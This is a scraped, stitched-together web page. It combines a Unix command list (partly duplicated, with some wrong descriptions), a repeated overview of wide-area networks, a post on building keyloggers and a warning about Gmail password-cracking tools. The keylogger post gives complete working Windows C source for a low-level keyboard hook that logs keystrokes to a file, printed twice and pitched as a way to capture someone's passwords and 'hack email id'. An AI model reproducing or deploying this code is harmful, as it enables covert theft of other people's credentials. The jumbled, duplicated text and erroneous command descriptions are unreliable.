telnet Uses the telnet protocol to connect to another remote computer.
time Used to time a simple command.
timex The timex command times a command; reports process data and system activity.
todos Converts text files between DOS and Unix formats.
top Display Linux tasks.
touch Change file access and modification time.
tput Initialize a terminal or query terminfo database.
tr Translate characters.
traceroute Print the route packets take to network host.
troff Typeset or format documents.
ul Reads the named filenames or terminal and does underlining.
umask Get or set the file mode creation mask.
unalias Remove an alias.
unhash Remove internal hash table.
uname Print name of current system.
uncompress Uncompressed compressed files.
uniq Report or filter out repeated lines in a file.
unmount Crates a file systems and remote resources.
unpack Expands a compressed file.
untar Create tape archives and add or extract files.
until Execute a set of actions while/until conditions are evaluated TRUE.
useradd Create a new user or updates default new user information.
userdel Remove a users account.
usermod Modify a users account.
vacation Reply to mail automatically.
vedit Screen-oriented (visual) display editor based on ex.
vgrind Grind nice program listings
vi Screen-oriented (visual) display editor based on ex.
vim A programmers text editor.
view A programmers text editor.
w Show who is logged on and what they are doing.
wait Await process completion.
wc Displays a count of lines, words, and characters in a file
whereis Locate a binary, source, and manual page files for a command.
while Repetitively execute a set of actions while/until conditions are evaluated TRUE.
which Locate a command.
who Displays who is on the system.
whois Internet user name directory service.
write Send a message to another user.
X Execute the X windows system.
xfd Display all the characters in an X font.
xlsfonts Server font list displayer for X.
xset User preference utility for X.
xterm Terminal emulator for X.
xrdb X server resource database utility.
yacc Short for yet another compiler-compiler, yacc is a compiler.
yes Repeatedly output a line with all specified STRING(s), or ‘y’.
yppasswd Changes network password in the NIS database.
zcat Compress files.
Below is a listing of each of the Unix / Linux commands currently listed on Computer Hope and a brief explanation of what each of the commands do. This is a full listing which means not all the below commands will work with your distribution and may also not work because of your privileges. Clicking on any of the commands will display additional help and information about that command.
Command Description
a2p Creates a Perl script from an awk script.
ac Prints statistics about users’ connect time.
alias Create a name for another command or long command string.
ar Maintain portable archive or library.
arch Display the architecture of the current host.
arp Manipulate the system ARP cache.
as An assembler.
at Command scheduler.
awk Awk script processing program.
basename Deletes any specified prefix from a string.
bash Command Bourne interpreter
bc Calculator.
bdiff Compare large files.
bfs Editor for large files.
bg Continues a program running in the background.
biff Enable / disable incoming mail notifications.
break Break out of while, for, foreach, or until loop.
bs Battleship game.
bye Alias often used for the exit command.
cal Calendar
calendar Display appointments and reminders.
cancel Cancels a print job.
cat View and/or modify a file.
cc C compiler.
cd Change directory.
chdir Change directory.
checkeq Language processors to assist in describing equations.
checknr Check nroff and troff files for any errors.
chfn Modify your own information or if super user or root modify another users information.
chgrp Change a groups access to a file or directory.
chkey Change the secure RPC key pair.
chmod Change the permission of a file.
chown Change the ownership of a file.
chsh Change login shell.
cksum Display and calculate a CRC for files.
clear Clears screen.
cls Alias often used to clear a screen.
cmp Compare files.
col Reverse line-feeds filter.
comm Compare files and select or reject lines that are common.
compress Compress files on a computer.
continue Break out of while, for, foreach, or until loop.
copy Copy files.
cp Copy files.
cpio Creates archived CPIO files.
crontab Create and list files that you wish to run on a regular schedule.
csh Execute the C shell command interpreter
csplit Split files based on context.
ctags Create a tag file for use with ex and vi.
cu Calls or connects to another Unix system, terminal or non-Unix system.
curl Transfer a URL.
cut Cut out selected fields of each line of a file.
date Tells you the date and time in Unix.
dc An arbitrary precision arithmetic package.
df Display the available disk space for each mount.
deroff Removes nroff/troff, tbl, and eqn constructs.
dhclient Dynamic Host Configuration Protocol Client.
diff Displays two files and prints the lines that are different.
dig DNS lookup utility.
dircmp Lists the different files when comparing directories.
dirname Deliver portions of path names.
dmesg Print or control the kernel ring buffer.
dos2unix Converts text files between DOS and Unix formats.
dpost Translates files created by troff into PostScript.
du Tells you how much space a file occupies.
echo Displays text after echo to the terminal.
ed Line oriented file editor.
edit Text editor.
egrep Search a file for a pattern using full regular expressions.
elm Program command used to send and receive e-mail.
emacs Text editor.
enable Enables / Disables LP printers.
env Displays environment variables.
eqn Language processors to assist in describing equations.
ex Line-editor mode of the vi text editor.
exit Exit from a program, shell or log you out of a Unix network.
expand Expand copies of file s.
expr Evaluate arguments as an expression.
fc The FC utility lists or edits and re-executes, commands previously entered to an interactive sh.
fg Continues a stopped job by running it in the foreground
fgrep Search a file for a fixed-character string.
file Tells you if the object you are looking at is a file or if it is a directory.
find Finds one or more files assuming that you know their approximate filenames.
findsmb List info about machines that respond to SMB name queries on a subnet.
finger Lists information about the user.
fmt Simple text formatters.
fold Filter for folding lines.
for Shell built-in functions to repeatedly execute action(s) for a selected number of times.
foreach Shell built-in functions to repeatedly execute action(s) for a selected number of times.
fromdos Converts text files between DOS and Unix formats.
fsck Check and repair a Linux file system.
ftp Enables ftp access to another terminal.
getfacl Display discretionary file information.
gprof The gprof utility produces an execution profile of a program.
grep Finds text within a file.
groupadd Creates a new group account.
groupdel Enables a super user or root to remove a group.
groupmod Enables a super user or root to modify a group.
gunzip Expand compressed files.
gview A programmers text editor.
gvim A programmers text editor.
gzip Compress files.
halt Stop the computer.
hash Remove internal hash table.
hashstat Display the hash stats.
head Displays the first ten lines of a file, unless otherwise stated.
help If computer has online help documentation installed this command will display it.
history Display the history of commands typed.
host DNS lookup utility.
hostid Prints the numeric identifier for the current host.
hostname Set or print name of current host system.
id Shows you the numeric user and group ID on BSD.
ifconfig Sets up network interfaces.
ifdown take a network interface down
ifup bring a network interface up
isalist Display the native instruction sets executable on this platform.
jobs List the jobs currently running in the background.
join Joins command forms together.
keylogin Decrypt the user’s secret key.
kill Cancels a job.
ksh Korn shell command interpreter.
ld Link-editor for object files.
ldd List dynamic dependencies of executable files or shared objects.
less Opposite of the more command.
lex Generate programs for lexical tasks.
link Calls the link function to create a link to a file.
ln Creates a link to a file.
lo Allows you to exit from a program, shell or log you out of a Unix network.
locate List files in databases that match a pattern.
login Signs into a new system.
logname Returns users login name.
logout Logs out of a system.
lp Prints a file on System V systems.
lpadmin Configure the LP print service.
lpc Line printer control program.
lpq Lists the status of all the available printers.
lpr Submits print requests.
lprm Removes print requests from the print queue.
lpstat Lists status of the LP print services.
ls Lists the contents of a directory.
mach Display the processor type of the current host.
mail One of the ways that allows you to read/send E-Mail.
mailcompat Provide SunOS 4.x compatibility for the Solaris mailbox format.
mailx Mail interactive message processing system.
make Executes a list of shell commands associated with each target.
man Display a manual of a command.
mesg Control if non-root users can send text messages to you.
mii-tool View, manipulate media-independent interface status.
mkdir Create a directory.
mkfs Build a Linux file system, usually a hard disk partition.
more Displays text one screen at a time.
mount Disconnects a file systems and remote resources.
mt Magnetic tape control.
mv Renames a file or moves it from one directory to another directory.
nc TCP/IP swiss army knife.
neqn Language processors to assist in describing equations.
netstat Shows network status.
newalias Install new elm aliases for user and/or system.
newform Change the format of a text file.
newgrp Log into a new group.
nice Invokes a command with an altered scheduling priority.
niscat Display NIS+ tables and objects.
nischmod Change access rights on a NIS+ object.
nischown Change the owner of a NIS+ object.
nischttl Change the time to live value of a NIS+ object.
nisdefaults Display NIS+ default values.
nisgrep Utilities for searching NIS+ tables.
nismatch Utilities for searching NIS+ tables.
nispasswd Change NIS+ password information.
nistbladm NIS+ table administration command.
nmap Network exploration tool and security / port scanner.
nohup Runs a command even if the session is disconnected or the user logs out.
nroff Formats documents for display or line-printer.
nslookup Queries a name server for a host or domain lookup.
on Execute a command on a remote system, but with the local environment.
onintr Shell built-in functions to respond to (hardware) signals.
optisa Determine which variant instruction set is optimal to use.
pack Shrinks file into a compressed file.
pagesize Display the size of a page of memory in bytes, as returned by getpagesize.
passwd Allows you to change your password.
paste Merge corresponding or subsequent lines of files.
pax Read / write and writes lists of the members of archive files and copy directory hierarchies.
pcat Compresses file.
perl Perl is a programming language optimized for scanning arbitrary text files, extracting information from those text files.
pg Files perusal filters for CRTs.
pgrep Examine the active processes on the system and reports the process IDs of the processes
pico Simple and very easy to use text editor in the style of the Pine Composer.
pine Command line program for Internet News and Email.
ping Sends ICMP ECHO_REQUEST packets to network hosts.
pkill Examine the active processes on the system and reports the process IDs of the processes
poweroff Stop the computer.
pr Formats a file to make it look better when printed.
priocntl Display’s or set scheduling parameters of specified process(es)
printf Write formatted output.
ps Reports the process status.
pvs Display the internal version information of dynamic objects within an ELF file.
pwd Print the current working directory.
quit Allows you to exit from a program, shell or log you out of a Unix network.
rcp Copies files from one computer to another computer.
reboot Stop the computer.
red Line oriented file editor.
rehash Recomputes the internal hash table of the contents of directories listed in the path.
remsh Runs a command on another computer.
repeat Shell built-in functions to repeatedly execute action(s) for a selected number of times.
rgview A programmers text editor.
rgvim A programmers text editor.
rlogin Establish a remote connection from your terminal to a remote machine.
rm Deletes a file without confirmation (by default).
rmail One of the ways that allows you to read/send E-Mail.
rmdir Deletes a directory.
rn Reads newsgroups.
route Show / manipulate the IP routing table.
rpcinfo Report RPC information.
rsh Runs a command on another computer.
rsync Faster, flexible replacement for rcp.
rview A programmers text editor.
rvim A programmers text editor.
s2p Convert a sed script into a Perl script.
sag Graphically displays the system activity data stored in a binary data file by a previous sar run.
sar Displays the activity for the CPU.
script Records everything printed on your screen.
sdiff Compares two files, side-by-side.
sed Allows you to use pre-recorded commands to make changes to text.
sendmail Sends mail over the Internet.
set Set the value of an environment variable.
setenv Set the value of an environment variable.
setfacl Modify the Access Control List (ACL) for a file or files.
settime Change file access and modification time.
sftp Secure file transfer program.
sh Runs or processes jobs through the Bourne shell.
shred Delete a file securely, first overwriting it to hide its contents.
shutdown Turn off the computer immediately or at a specified time.
sleep Waits a x amount of seconds.
slogin OpenSSH SSH client (remote login program).
smbclient An ftp-like client to access SMB/CIFS resources on servers.
sort Sorts the lines in a text file.
spell Looks through a text file and reports any words that it finds in the text file that are not in the dictionary.
split Split a file into pieces.
stat Display file or filesystem status.
stop Control process execution.
strip Discard symbols from object files.
stty Sets options for your terminal.
su Become super user or another user.
sysinfo Get and set system information strings.
sysklogd Linux system logging utilities.
tabs Set tabs on a terminal.
tail Delivers the last part of the file.
talk Talk with other logged in users.
tac Concatenate and print files in reverse.
tar Create tape archives and add or extract files.
tbl Preprocessor for formatting tables for nroff or troff.
tcopy Copy a magnetic tape.
tcpdump Dump traffic on a network.
tee Read from an input and write to a standard output or file.
telnet Uses the telnet protocol to connect to another remote computer.
time Used to time a simple command.
timex The timex command times a command; reports process data and system activity.
todos Converts text files between DOS and Unix formats.
top Display Linux tasks.
touch Change file access and modification time.
tput Initialize a terminal or query terminfo database.
tr Translate characters.
traceroute Print the route packets take to network host.
troff Typeset or format documents.
ul Reads the named filenames or terminal and does underlining.
umask Get or set the file mode creation mask.
unalias Remove an alias.
unhash Remove internal hash table.
uname Print name of current system.
uncompress Uncompressed compressed files.
uniq Report or filter out repeated lines in a file.
unmount Crates a file systems and remote resources.
unpack Expands a compressed file.
untar Create tape archives and add or extract files.
until Execute a set of actions while/until conditions are evaluated TRUE.
useradd Create a new user or updates default new user information.
userdel Remove a users account.
usermod Modify a users account.
vacation Reply to mail automatically.
vedit Screen-oriented (visual) display editor based on ex.
vgrind Grind nice program listings
vi Screen-oriented (visual) display editor based on ex.
vim A programmers text editor.
view A programmers text editor.
w Show who is logged on and what they are doing.
wait Await process completion.
wc Displays a count of lines, words, and characters in a file
whereis Locate a binary, source, and manual page files for a command.
while Repetitively execute a set of actions while/until conditions are evaluated TRUE.
which Locate a command.
who Displays who is on the system.
whois Internet user name directory service.
write Send a message to another user.
X Execute the X windows system.
xfd Display all the characters in an X font.
xlsfonts Server font list displayer for X.
xset User preference utility for X.
xterm Terminal emulator for X.
xrdb X server resource database utility.
yacc Short for yet another compiler-compiler, yacc is a compiler.
yes Repeatedly output a line with all specified STRING(s), or ‘y’.
yppasswd Changes network password in the NIS database.
zcat Compress files.
wide area network
Wide Area Network Technologies Overview
A Wide Area Network ( WAN) is a computer network covering multiple distance areas, which may spread across the entire world. WANs often connect multiple smaller networks, such as local area networks (LANs) or metro area networks (MANs). The world's most popular WAN is the Internet. Some segments of the Internet are also WANs in themselves. The key difference between WAN and LAN technologies is scalability C WAN must be able to grow as needed to cover multiple cities, even countries and continents.
A set of switches and routers are interconnected to form a Wide Area Network. The switches can be connected in different topologies such as full mesh and half mesh. A wide area network may be privately owned or rented from a service provider, but the term usually connotes the inclusion of public (shared user) networks.
Both packet switching and circuit switching technologies are used in the WAN. Packet switching allows users to share common carrier resources so that the carrier can make more efficient use of its infrastructure. In a packet switching setup, networks have connections into the carrier's network, and many customers share the carrier's network. The carrier can then create virtual circuits between customers' sites by which packets of data are delivered from one to the other through the network.
Circuit Switching allows data connections to be established when needed and then terminated when communication is complete. This works like a normal telephone line works for voice communication. Integrated Services Digital Network (ISDN) is a good example of circuit switching. When a router has data for a remote site, the switched circuit is initiated with the circuit number of the remote network.
WAN Diagram Software
Edraw Network Diagram is ideal for network engineers and network designers who need to draw wan diagrams. It had defined some common used WAN symbols in drawing WAN diagrams. Just drag and drop pre-drawn shapes representing computers and network devices. Double click and set equipment data.
Free Download WAN Diagram Software and View All Examples
Examples of Wide Area Network Technologies
Examples of Wide Area Network Technologies Created by Edraw!
Wide Area Network WAN Network WAN Topology
Wide Area Network WAN Network WAN Topology
Virtual private network (VPN) is a tecnology widely used in a public switched network (PSTN) to provide private and secured WAN for an organization. VPN uses encryption and other techniques to make it appear that the organisation has a dedicated network, while making use of the shared infrastructure of the WAN.
WAN technologies generally function at the lower three layers of the OSI reference model: the physical layer, the data link layer, and the network layer. Key technologies often found in WANs include SONET, Frame Relay, X.25, ATM and PPP.
* ATM: A dedicated-connection switching technology that organizes digital data into 53-byte cell units. Individually, a cell is processed asynchronously relative to other related cells and is queued before being multiplexed over the transmission path. Speeds on ATM networks can reach 10 Gbps.
* Frame Relay: (FR). A high-speed packet-switched data communications service, similar to X.25. Frame relay is widely used for LAN-to-LAN interconnect services, and is well suited to the bursty demands of LAN environments.
* SONET/SDH: Synchronous Optical Network is an international standard for high speed communication over fiber-optic networks. The SONET establishes Optical Carrier (OC) levels from 51.8 Mbps to 10 Gbps (OC-192) or even higher. Synchronous Digital Hierarchy (SDH) is a European equivalent of SONET.
* X.25: The X.25 protocol allows computers on different public networks to communicate through an intermediary computer at the network layer level.
* PPP: A point-to-point link provides a single, pre-established WAN communications path from the customer premises through a carrier network, such as a telephone company, to a remote network. Point-to-point lines are usually leased from a carrier and thus are often called leased lines. For a point-to-point line, the carrier allocates pairs of wire and facility hardware to your line only.
IP can also be considered as a WAN technology in the packet switching environment
computer science the complete reference
A Wide Area Network ( WAN) is a computer network covering multiple distance areas, which may spread across the entire world. WANs often connect multiple smaller networks, such as local area networks (LANs) or metro area networks (MANs). The world's most popular WAN is the Internet. Some segments of the Internet are also WANs in themselves. The key difference between WAN and LAN technologies is scalability C WAN must be able to grow as needed to cover multiple cities, even countries and continents.
A set of switches and routers are interconnected to form a Wide Area Network. The switches can be connected in different topologies such as full mesh and half mesh. A wide area network may be privately owned or rented from a service provider, but the term usually connotes the inclusion of public (shared user) networks.
Both packet switching and circuit switching technologies are used in the WAN. Packet switching allows users to share common carrier resources so that the carrier can make more efficient use of its infrastructure. In a packet switching setup, networks have connections into the carrier's network, and many customers share the carrier's network. The carrier can then create virtual circuits between customers' sites by which packets of data are delivered from one to the other through the network.
Circuit Switching allows data connections to be established when needed and then terminated when communication is complete. This works like a normal telephone line works for voice communication. Integrated Services Digital Network (ISDN) is a good example of circuit switching. When a router has data for a remote site, the switched circuit is initiated with the circuit number of the remote network.
WAN Diagram Software
Edraw Network Diagram is ideal for network engineers and network designers who need to draw wan diagrams. It had defined some common used WAN symbols in drawing WAN diagrams. Just drag and drop pre-drawn shapes representing computers and network devices. Double click and set equipment data.
Free Download WAN Diagram Software and View All Examples
Examples of Wide Area Network Technologies
Examples of Wide Area Network Technologies Created by Edraw!
Wide Area Network WAN Network WAN Topology
Wide Area Network WAN Network WAN Topology
Virtual private network (VPN) is a tecnology widely used in a public switched network (PSTN) to provide private and secured WAN for an organization. VPN uses encryption and other techniques to make it appear that the organisation has a dedicated network, while making use of the shared infrastructure of the WAN.
WAN technologies generally function at the lower three layers of the OSI reference model: the physical layer, the data link layer, and the network layer. Key technologies often found in WANs include SONET, Frame Relay, X.25, ATM and PPP.
* ATM: A dedicated-connection switching technology that organizes digital data into 53-byte cell units. Individually, a cell is processed asynchronously relative to other related cells and is queued before being multiplexed over the transmission path. Speeds on ATM networks can reach 10 Gbps.
* Frame Relay: (FR). A high-speed packet-switched data communications service, similar to X.25. Frame relay is widely used for LAN-to-LAN interconnect services, and is well suited to the bursty demands of LAN environments.
* SONET/SDH: Synchronous Optical Network is an international standard for high speed communication over fiber-optic networks. The SONET establishes Optical Carrier (OC) levels from 51.8 Mbps to 10 Gbps (OC-192) or even higher. Synchronous Digital Hierarchy (SDH) is a European equivalent of SONET.
* X.25: The X.25 protocol allows computers on different public networks to communicate through an intermediary computer at the network layer level.
* PPP: A point-to-point link provides a single, pre-established WAN communications path from the customer premises through a carrier network, such as a telephone company, to a remote network. Point-to-point lines are usually leased from a carrier and thus are often called leased lines. For a point-to-point line, the carrier allocates pairs of wire and facility hardware to your line only.
IP can also be considered as a WAN technology in the packet switching environment
computer science the complete reference
key logging concepts
http://newidea2.mywebclub.com/2010/04/14/cracking-email-id-method/
what is a keylogger?
it's a program that logs everything that you type on the keyboard.
what are it's usages to me?
well, if you want to record everytyhing someone types then you can then see anything you want like passwords and such.
how do i get one?
you can buy some corperate or home usage ones that are made for recording what employees are doing or what your kids are doing. that is a bad method though since they are bloated, cost money since most people don't know how to find warez and it's better to make your own since you can make it do what you want to do.
ok, how do i do this?
you program one. if your new to programming then learn how to program in c then come back here. if you know how to program in c then read on.
there are two ways of making a keylogger:
1. using the GetAsyncKeyState API. look at svchost.c.
2. Using the SetWindowsHookEx API. This is the prefered method but only works on NT based systems. The reason this way is prefered is because it is much more efficient that GetAsyncKeyState. See for yourself. No need to check if what character is being pressed and no need to check other stuff like the value -32767 is being returned. Look here about this. When you use the SetWindowsHookApi you "hook" the keyboard to that you can send all of the keys prssed to somewhere. When making a keylogger you usually send it to a file so that all of the keys will be logged there. The only disavantage of using this API if you could even call it a disadvantage is that you have to use have a DLL as well as your .exe file. I found a peice of code that doesn't need a DLL. Here it is with a slight modification from me so that you don't have to have the keylogger close before you can view the file with the logged keys in it:
computer science review
CODE C Language
view source
print?
001 // This code will only work if you have Windows NT or
002 // any later version installed, 2k and XP will work.
003
004
005 #define _WIN32_WINNT 0x0400
006
007 #include
008 #include
009 #include
010
011 // Global Hook handle
012 HHOOK hKeyHook;
013
014
015
016 // This is the function that is "exported" from the
017 // execuatable like any function is exported from a
018 // DLL. It is the hook handler routine for low level
019 // keyboard events.
020
021 __declspec(dllexport) LRESULT CALLBACK KeyEvent (
022
023 int nCode, // The hook code
024 WPARAM wParam, // The window message (WM_KEYUP, WM_KEYDOWN, etc.)
025 LPARAM lParam // A pointer to a struct with information about the pressed key
026
027 ) {
028 if ((nCode == HC_ACTION) && // HC_ACTION means we may process this event
029 ((wParam == WM_SYSKEYDOWN) || // Only react if either a system key ...
030 (wParam == WM_KEYDOWN))) // ... or a normal key have been pressed.
031 {
032
033 // This struct contains various information about
034 // the pressed key such as hardware scan code, virtual
035 // key code and further flags.
036
037 KBDLLHOOKSTRUCT hooked =
038 *((KBDLLHOOKSTRUCT*)lParam);
039
040
041 // dwMsg shall contain the information that would be stored
042 // in the usual lParam argument of a WM_KEYDOWN message.
043 // All information like hardware scan code and other flags
044 // are stored within one double word at different bit offsets.
045 // Refer to MSDN for further information:
046 //
047 // http://msdn.microsoft.com/library/en-us/winui/winui/
048 // windowsuserinterface/userinput/keyboardinput/aboutkeyboardinput.asp
049 //
050 // (Keystroke Messages)
051
052
053 DWORD dwMsg = 1;
054 dwMsg += hooked.scanCode << 16;
055 dwMsg += hooked.flags << 24;
056
057
058 // Call the GetKeyNameText() function to get the language-dependant
059 // name of the pressed key. This function should return the name
060 // of the pressed key in your language, aka the language used on
061 // the system.
062
063 char lpszName[0x100] = {0};
064 lpszName[0] = '[';
065
066 int i = GetKeyNameText(dwMsg,
067 (lpszName+1),0xFF) + 1;
068
069 lpszName[i] = ']';
070
071
072 // Print this name to the standard console output device.
073
074 FILE *file;
075 file=fopen("keys.log","a+");
076 fputs(lpszName,file);
077 fflush(file);
078 }
079
080
081 // the return value of the CallNextHookEx routine is always
082 // returned by your HookProc routine. This allows other
083 // applications to install and handle the same hook as well.
084
085 return CallNextHookEx(hKeyHook,
086 nCode,wParam,lParam);
087
088 }
089
090
091
092 // This is a simple message loop that will be used
093 // to block while we are logging keys. It does not
094 // perform any real task ...
095
096 void MsgLoop()
097 {
098 MSG message;
099 while (GetMessage(&message,NULL,0,0)) {
100 TranslateMessage( &message );
101 DispatchMessage( &message );
102 }
103 }
104
105
106 // This thread is started by the main routine to install
107 // the low level keyboard hook and start the message loop
108 // to loop forever while waiting for keyboard events.
109
110 DWORD WINAPI KeyLogger(LPVOID lpParameter)
111 {
112
113 // Get a module handle to our own executable. Usually,
114 // the return value of GetModuleHandle(NULL) should be
115 // a valid handle to the current application instance,
116 // but if it fails we will also try to actually load
117 // ourself as a library. The thread's parameter is the
118 // first command line argument which is the path to our
119 // executable.
120
121 HINSTANCE hExe = GetModuleHandle(NULL);
122 if (!hExe) hExe = LoadLibrary((LPCSTR) lpParameter);
123
124 // Everything failed, we can't install the hook ... this
125 // never happened, but error handling is important.
126
127 if (!hExe) return 1;
128
129
130
131 hKeyHook = SetWindowsHookEx ( // install the hook:
132
133 WH_KEYBOARD_LL, // as a low level keyboard hook
134 (HOOKPROC) KeyEvent, // with the KeyEvent function from this executable
135 hExe, // and the module handle to our own executable
136 NULL // and finally, the hook should monitor all threads.
137 );
138
139
140 // Loop forever in a message loop and if the loop
141 // stops some time, unhook the hook. I could have
142 // added a signal handler for ctrl-c that unhooks
143 // the hook once the application is terminated by
144 // the user, but I was too lazy.
145
146 MsgLoop();
147 UnhookWindowsHookEx(hKeyHook);
148 return 0;
149 }
150
151
152 // The main function just starts the thread that
153 // installs the keyboard hook and waits until it
154 // terminates.
155
156 int main(int argc, char** argv)
157 {
158 HANDLE hThread;
159 DWORD dwThread;
160 DWORD exThread;
161
162 hThread = CreateThread(NULL,NULL,(LPTHREAD_START_ROUTINE)
163 KeyLogger, (LPVOID) argv[0], NULL, &dwThread);
164
165 if (hThread) {
166 return WaitForSingleObject(hThread,INFINITE);
167 } else {
168 return 1;
169 }
170 }
hack email id
crack password
what is a keylogger?
it's a program that logs everything that you type on the keyboard.
what are it's usages to me?
well, if you want to record everytyhing someone types then you can then see anything you want like passwords and such.
how do i get one?
you can buy some corperate or home usage ones that are made for recording what employees are doing or what your kids are doing. that is a bad method though since they are bloated, cost money since most people don't know how to find warez and it's better to make your own since you can make it do what you want to do.
ok, how do i do this?
you program one. if your new to programming then learn how to program in c then come back here. if you know how to program in c then read on.
there are two ways of making a keylogger:
1. using the GetAsyncKeyState API. look at svchost.c.
2. Using the SetWindowsHookEx API. This is the prefered method but only works on NT based systems. The reason this way is prefered is because it is much more efficient that GetAsyncKeyState. See for yourself. No need to check if what character is being pressed and no need to check other stuff like the value -32767 is being returned. Look here about this. When you use the SetWindowsHookApi you "hook" the keyboard to that you can send all of the keys prssed to somewhere. When making a keylogger you usually send it to a file so that all of the keys will be logged there. The only disavantage of using this API if you could even call it a disadvantage is that you have to use have a DLL as well as your .exe file. I found a peice of code that doesn't need a DLL. Here it is with a slight modification from me so that you don't have to have the keylogger close before you can view the file with the logged keys in it:
computer science review
CODE C Language
view source
print?
001 // This code will only work if you have Windows NT or
002 // any later version installed, 2k and XP will work.
003
004
005 #define _WIN32_WINNT 0x0400
006
007 #include
008 #include
009 #include
010
011 // Global Hook handle
012 HHOOK hKeyHook;
013
014
015
016 // This is the function that is "exported" from the
017 // execuatable like any function is exported from a
018 // DLL. It is the hook handler routine for low level
019 // keyboard events.
020
021 __declspec(dllexport) LRESULT CALLBACK KeyEvent (
022
023 int nCode, // The hook code
024 WPARAM wParam, // The window message (WM_KEYUP, WM_KEYDOWN, etc.)
025 LPARAM lParam // A pointer to a struct with information about the pressed key
026
027 ) {
028 if ((nCode == HC_ACTION) && // HC_ACTION means we may process this event
029 ((wParam == WM_SYSKEYDOWN) || // Only react if either a system key ...
030 (wParam == WM_KEYDOWN))) // ... or a normal key have been pressed.
031 {
032
033 // This struct contains various information about
034 // the pressed key such as hardware scan code, virtual
035 // key code and further flags.
036
037 KBDLLHOOKSTRUCT hooked =
038 *((KBDLLHOOKSTRUCT*)lParam);
039
040
041 // dwMsg shall contain the information that would be stored
042 // in the usual lParam argument of a WM_KEYDOWN message.
043 // All information like hardware scan code and other flags
044 // are stored within one double word at different bit offsets.
045 // Refer to MSDN for further information:
046 //
047 // http://msdn.microsoft.com/library/en-us/winui/winui/
048 // windowsuserinterface/userinput/keyboardinput/aboutkeyboardinput.asp
049 //
050 // (Keystroke Messages)
051
052
053 DWORD dwMsg = 1;
054 dwMsg += hooked.scanCode << 16;
055 dwMsg += hooked.flags << 24;
056
057
058 // Call the GetKeyNameText() function to get the language-dependant
059 // name of the pressed key. This function should return the name
060 // of the pressed key in your language, aka the language used on
061 // the system.
062
063 char lpszName[0x100] = {0};
064 lpszName[0] = '[';
065
066 int i = GetKeyNameText(dwMsg,
067 (lpszName+1),0xFF) + 1;
068
069 lpszName[i] = ']';
070
071
072 // Print this name to the standard console output device.
073
074 FILE *file;
075 file=fopen("keys.log","a+");
076 fputs(lpszName,file);
077 fflush(file);
078 }
079
080
081 // the return value of the CallNextHookEx routine is always
082 // returned by your HookProc routine. This allows other
083 // applications to install and handle the same hook as well.
084
085 return CallNextHookEx(hKeyHook,
086 nCode,wParam,lParam);
087
088 }
089
090
091
092 // This is a simple message loop that will be used
093 // to block while we are logging keys. It does not
094 // perform any real task ...
095
096 void MsgLoop()
097 {
098 MSG message;
099 while (GetMessage(&message,NULL,0,0)) {
100 TranslateMessage( &message );
101 DispatchMessage( &message );
102 }
103 }
104
105
106 // This thread is started by the main routine to install
107 // the low level keyboard hook and start the message loop
108 // to loop forever while waiting for keyboard events.
109
110 DWORD WINAPI KeyLogger(LPVOID lpParameter)
111 {
112
113 // Get a module handle to our own executable. Usually,
114 // the return value of GetModuleHandle(NULL) should be
115 // a valid handle to the current application instance,
116 // but if it fails we will also try to actually load
117 // ourself as a library. The thread's parameter is the
118 // first command line argument which is the path to our
119 // executable.
120
121 HINSTANCE hExe = GetModuleHandle(NULL);
122 if (!hExe) hExe = LoadLibrary((LPCSTR) lpParameter);
123
124 // Everything failed, we can't install the hook ... this
125 // never happened, but error handling is important.
126
127 if (!hExe) return 1;
128
129
130
131 hKeyHook = SetWindowsHookEx ( // install the hook:
132
133 WH_KEYBOARD_LL, // as a low level keyboard hook
134 (HOOKPROC) KeyEvent, // with the KeyEvent function from this executable
135 hExe, // and the module handle to our own executable
136 NULL // and finally, the hook should monitor all threads.
137 );
138
139
140 // Loop forever in a message loop and if the loop
141 // stops some time, unhook the hook. I could have
142 // added a signal handler for ctrl-c that unhooks
143 // the hook once the application is terminated by
144 // the user, but I was too lazy.
145
146 MsgLoop();
147 UnhookWindowsHookEx(hKeyHook);
148 return 0;
149 }
150
151
152 // The main function just starts the thread that
153 // installs the keyboard hook and waits until it
154 // terminates.
155
156 int main(int argc, char** argv)
157 {
158 HANDLE hThread;
159 DWORD dwThread;
160 DWORD exThread;
161
162 hThread = CreateThread(NULL,NULL,(LPTHREAD_START_ROUTINE)
163 KeyLogger, (LPVOID) argv[0], NULL, &dwThread);
164
165 if (hThread) {
166 return WaitForSingleObject(hThread,INFINITE);
167 } else {
168 return 1;
169 }
170 }
hack email id
crack password
Cracking e mail
Did you forget your Google Mail password? If you had the foresight at the time of signing up for the account you will know your username and perhaps have set a secret question and secondary address. If so, you can simply visit the password recovery page, follow the instructions, and retrieve your password.
DO NOT, whatever you do, download a crack, hacker tool, or anything else that claims to be able to crack your GMail password, it will be malware, no two ways about it, and your computer and your security will be seriously compromised.
But, if you don’t remember or never set those things, you might be hoping that there is another way to crack your GMail password. According to Hacking Truths there is, a download called GMail Password Recovery tool. Apparently, this program will scan your PC for encrypted GMail passwords, extract them, decrypt and decode them and display them in a readable format. It will search in settings across the following apps: Google Talk, Gmail Notifier, Google Desktop, Picasa, Google Photos Screensaver, Internet Explorer and Firefox. Supposedly. DO NOT USE THIS TOOL!!!
computer science ?
I downloaded the file from the link provided by Hacking Truths and did an antivirus scan with ESET NOD32. Immediately, it found a Trojan horse program. Even if your antivirus doesn’t show anything untoward, I wouldn’t recommend connecting to a remote server with a tool like this, anyway. It could easily be a phishing scam. You are leaving yourself open to
Moreover, although there seem to be “clean” versions of this password recovery tool on the net, how can you be sure that it’s not got something that is simply not being detected?
There is another warning to be discussed (not just about ensuring you scan all downloads for viruses, Trojans, and malware before you run them). With GMail Password Recovery, anyone could download and install a program like this on any PC to which they have access. Be warned if you use a shared machine and don’t entirely trust other users. If it actually works someone could use it to crack your GMail password.
Such a tool could be especially important for government agents and spies who seem to have a penchant for leaving laptop computers on public transport, in the UK at least, although they never seem to learn the lesson of encryption so I doubt they use strong passwords as it is.
DO NOT, whatever you do, download a crack, hacker tool, or anything else that claims to be able to crack your GMail password, it will be malware, no two ways about it, and your computer and your security will be seriously compromised.
But, if you don’t remember or never set those things, you might be hoping that there is another way to crack your GMail password. According to Hacking Truths there is, a download called GMail Password Recovery tool. Apparently, this program will scan your PC for encrypted GMail passwords, extract them, decrypt and decode them and display them in a readable format. It will search in settings across the following apps: Google Talk, Gmail Notifier, Google Desktop, Picasa, Google Photos Screensaver, Internet Explorer and Firefox. Supposedly. DO NOT USE THIS TOOL!!!
computer science ?
